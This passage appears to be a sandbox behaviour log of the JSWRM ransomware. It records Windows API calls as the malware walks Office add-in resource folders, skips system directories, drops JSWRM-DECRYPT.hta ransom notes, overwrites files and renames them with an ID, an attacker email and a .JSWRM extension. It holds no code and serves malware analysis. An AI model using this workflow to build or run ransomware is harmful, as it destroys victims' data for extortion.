lpUsedDefaultChar=0x0) returned 30 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2412b8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x241128, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.279] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.279] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1038\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.279] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=72288) returned 1 [0127.279] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.280] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0127.286] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.286] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0127.287] CloseHandle (hObject=0x264) returned 1 [0127.287] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1038\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1038\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1038\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.288] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x11a60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.288] FindClose (in: hFindFile=0x231d40 | out: hFindFile=0x231d40) returned 1 [0127.288] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x381f2dc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1040", cAlternateFileName="")) returned 1 [0127.288] lstrcmpiW (lpString1="1040", lpString2=".") returned 1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="..") returned 1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="...") returned 1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="windows") returned -1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="recovery") returned -1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="perflogs") returned -1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="documents and settings") returned -1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="$RECYCLE.BIN") returned 1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="system volume information") returned -1 [0127.288] lstrcmpiW (lpString1="1040", lpString2="msocache") returned -1 [0127.288] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1040\\jswrm-decrypt.hta")) returned 0xffffffff [0127.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.292] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.292] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1040\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.293] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.293] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.294] CloseHandle (hObject=0x338) returned 1 [0127.294] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1040\\jswrm-decrypt.hta")) returned 0x20 [0127.294] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4287c23d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0127.294] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.294] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4287c23d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.294] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.294] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.294] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4287c23d, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4287c23d, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4287c23d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0127.294] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0127.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0127.295] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2=".") returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="..") returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="...") returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="windows") returned -1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="recovery") returned -1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="perflogs") returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="documents and settings") returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="$RECYCLE.BIN") returned 1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="system volume information") returned -1 [0127.295] lstrcmpiW (lpString1="PowerPivotExcelClientAddIn.rll", lpString2="msocache") returned 1 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x240f20, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivotExcelClientAddIn.rll", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivotExcelClientAddIn.rll", lpUsedDefaultChar=0x0) returned 30 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.296] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1040\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.297] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=70848) returned 1 [0127.297] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.297] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x114c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x114c0, lpOverlapped=0x0) returned 1 [0127.305] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.305] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x114c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x114c0, lpOverlapped=0x0) returned 1 [0127.305] CloseHandle (hObject=0x264) returned 1 [0127.306] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1040\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1040\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1040\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.307] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x381f2dc, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x381f2dc, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x114c0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 0 [0127.307] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0127.307] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6355df6, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="1041", cAlternateFileName="")) returned 1 [0127.307] lstrcmpiW (lpString1="1041", lpString2=".") returned 1 [0127.307] lstrcmpiW (lpString1="1041", lpString2="..") returned 1 [0127.307] lstrcmpiW (lpString1="1041", lpString2="...") returned 1 [0127.307] lstrcmpiW (lpString1="1041", lpString2="windows") returned -1 [0127.307] lstrcmpiW (lpString1="1041", lpString2="recovery") returned -1 [0127.307] lstrcmpiW (lpString1="1041", lpString2="perflogs") returned -1 [0127.307] lstrcmpiW (lpString1="1041", lpString2="documents and settings") returned -1 [0127.308] lstrcmpiW (lpString1="1041", lpString2="$RECYCLE.BIN") returned 1 [0127.308] lstrcmpiW (lpString1="1041", lpString2="system volume information") returned -1 [0127.308] lstrcmpiW (lpString1="1041", lpString2="msocache") returned -1 [0127.308] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1041\\jswrm-decrypt.hta")) returned 0xffffffff [0127.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0127.308] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0127.308] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1041\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0127.309] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.309] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0127.310] CloseHandle (hObject=0x338) returned 1 [0127.310] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1041\\jswrm-decrypt.hta")) returned 0x20 [0127.310] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x428a2473, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName=".", cAlternateFileName="")) returned 0x2320c0 [0127.311] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0127.311] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x428a2473, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="..", cAlternateFileName="")) returned 1 [0127.311] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0127.311] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0127.311] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x428a2473, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x428a2473, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x428a2473, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0127.311] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10e60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, cFileName="PowerPivotExcelClientAddIn.rll", cAlternateFileName="POWERP~1.RLL")) returned 1 [0127.311] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1041\\powerpivotexcelclientaddin.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0127.312] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=69216) returned 1 [0127.312] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.312] ReadFile (in: hFile=0x264, lpBuffer=0x27a340, nNumberOfBytesToRead=0x10e60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesRead=0x345de64*=0x10e60, lpOverlapped=0x0) returned 1 [0127.318] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.318] WriteFile (in: hFile=0x264, lpBuffer=0x27a340*, nNumberOfBytesToWrite=0x10e60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27a340*, lpNumberOfBytesWritten=0x345de60*=0x10e60, lpOverlapped=0x0) returned 1 [0127.319] CloseHandle (hObject=0x264) returned 1 [0127.319] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1041\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1041\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1041\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0127.320] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6355df6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6355df6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x167f56e9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x10e60, dwReserved0=0x60002, dwReserved1=0x1fc8c2, 